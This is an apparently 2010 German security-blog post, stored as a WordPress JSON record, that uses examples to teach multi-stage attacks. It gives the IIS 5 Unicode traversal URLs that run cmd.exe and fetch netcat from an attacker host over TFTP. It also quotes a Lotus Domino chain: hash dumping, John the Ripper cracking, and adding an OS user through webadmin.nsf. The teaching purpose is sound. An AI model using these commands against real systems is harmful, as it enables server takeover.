{"id":1286,"date":"2010-06-04T21:23:52","date_gmt":"2010-06-04T20:23:52","guid":{"rendered":"http:\/\/www.mitternachtshacking.de\/blog\/1286-mehrstufige-angriffe-fur-lotus-domino"},"modified":"2025-04-05T23:32:08","modified_gmt":"2025-04-05T21:32:08","slug":"mehrstufige-angriffe-fur-lotus-domino","status":"publish","type":"post","link":"https:\/\/www.mitternachtshacking.de\/blog\/1286-mehrstufige-angriffe-fur-lotus-domino","title":{"rendered":"Mehrstufige Angriffe f\u00fcr Lotus Domino"},"content":{"rendered":"

Mehrstufige Angriffe sind nach meiner Definition Angriffe, die mit einer scheinbar kleinen L\u00fccke beginnen, die dann aber \u00fcber mehrere Einzelschritte zu einer v\u00f6lligen Kompromittierung eines Systems f\u00fchren. In meinen Hacking-Seminaren verwende ich gerne ein Beispiel, das zwar steinalt ist, die Systematik eines Angriffs aber sehr sch\u00f6n vorf\u00fchrt: den IIS 5 Unicode Path Traversal Angriff.<\/p>\n

Auf den ersten Blick sieht der Unicode Path Traversal harmlos aus. Man kann damit auf Dateien au\u00dferhalb des eigentlich freigegebenen Verzeichnisses zugreifen. Das sieht aus wie eine relativ harmlose Verletzung der Vertraulichkeit auf einem \u00f6ffentlichen Webserver. Die Folgeschritte sehen dann so aus:<\/p>\n

    \n
  1. Unicode Path Traversal erlaubt es auf Dateien au\u00dferhalb des Inetpub zuzugreifen.<\/li>\n
  2. Das Scripts-Verzeichnis (und Unterverzeichnisse) enth\u00e4lt Dateien, die ausgef\u00fchrt werden d\u00fcrfen.<\/li>\n
  3. Mit Hilfe des Scripts-Verzeichnisses und dem Path Traversal kann man die cmd.exe starten, wenn sich Inetpub und WINNT auf dem gleichen Laufwerk befinden. Die URL die ich verwende ist „http:\/\/[Server-IP]\/scripts\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir“.<\/li>\n
  4. Bequemerweise kopiert man sich die cmd.exe direkt in das Scripts-Verzeichnis.<\/li>\n
  5. \u00dcber die cmd.exe kann man TFTP starten und beispielsweise Netcat herunterladen. Die URL die ich verwende ist „http:\/\/[Server-IP]\/scripts\/cmd.exe?\/c+tftp+-i+[Angreifer-IP]+GET+nc.exe“.<\/li>\n
  6. Netcat kann man wiederum \u00fcber die cmd.exe als Server starten. Schon hat man einen interaktiven Zugang. Allerdings mit beschr\u00e4nkten Rechten.<\/li>\n
  7. Mit dem IIS-Exploit der httpodbc.dll kann man LocalSystem-Rechte bekommen. Die httpodbc.dll l\u00e4dt man beispielsweise via TFTP in das Scripts-Verzeichnis.<\/li>\n<\/ol>\n

    Im Ergebnis hat man dann den Rechner komplett \u00fcbernommen. Nat\u00fcrlich gibt es den Unicodeloader, der diverse Schritte automatisch durchf\u00fchrt aber ich halte es f\u00fcr eine nette \u00dcbung, das schrittweise durchzuf\u00fchren.<\/p>\n

    F\u00fcr Lotus Notes gibt es jetzt eine \u00e4hnliche Anleitung: „Getting OS Access Using Lotus Domino Application Server<\/a>“ (PDF) von DSecRG:<\/p>\n

      \n
    1. Run raptor_dominohash script and collect all password hashes
      \n.\/raptor_dominohash 192.168.0.202<\/li>\n
    2. Save hashes in file using format described in the Stage 3.<\/li>\n
    3. Run JohnTheRipper with hashes file generated at the previous step
      \n.\/john HASH.txt –format=lotus5<\/li>\n
    4. If you find administrator’s hash you can address to:
      \nhttp:\/\/servername\/webadmin.nsf<\/li>\n
    5. In Quick Console run command that adds a new user to OS
      \nload cmd \/c net user dsecrG password \/all<\/li>\n
    6. For testing if this command successfully executed we run net user command and save the results to the file.
      \nload cmd \/c net user > C:\\Lotus\\Domino\\data\\domino\\html\\download\\filesets\\netuser1.png<\/li>\n
    7. To view the results we open the following link:
      \nhttp:\/\/servername\/download\/filesets\/netuser1.png<\/li>\n<\/ol>\n

      Ok, f\u00fcr diesen Angriff braucht man ein erfolgreich gecracktes Admin-Login aber man kann das Verfahren leicht anpassen wenn man einen geeigneten Exploit f\u00fcr Lotus Domino hat. Mal sehen, vielleicht nehme ich das weiteres Beispiel f\u00fcr mehrstufige Angriffe in meinen Hacking-Workshop mit auf.<\/p>\n","protected":false},"excerpt":{"rendered":"

      Mehrstufige Angriffe sind nach meiner Definition Angriffe, die mit einer scheinbar kleinen L\u00fccke beginnen, die dann aber \u00fcber mehrere Einzelschritte zu einer v\u00f6lligen Kompromittierung eines Systems f\u00fchren. In meinen Hacking-Seminaren verwende ich gerne ein Beispiel, das zwar steinalt ist, die Systematik eines Angriffs aber sehr sch\u00f6n vorf\u00fchrt: den IIS 5 Unicode Path Traversal Angriff. Auf […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[8],"tags":[],"_links":{"self":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts\/1286"}],"collection":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/comments?post=1286"}],"version-history":[{"count":0,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/posts\/1286\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/media?parent=1286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/categories?post=1286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mitternachtshacking.de\/blog\/wp-json\/wp\/v2\/tags?post=1286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}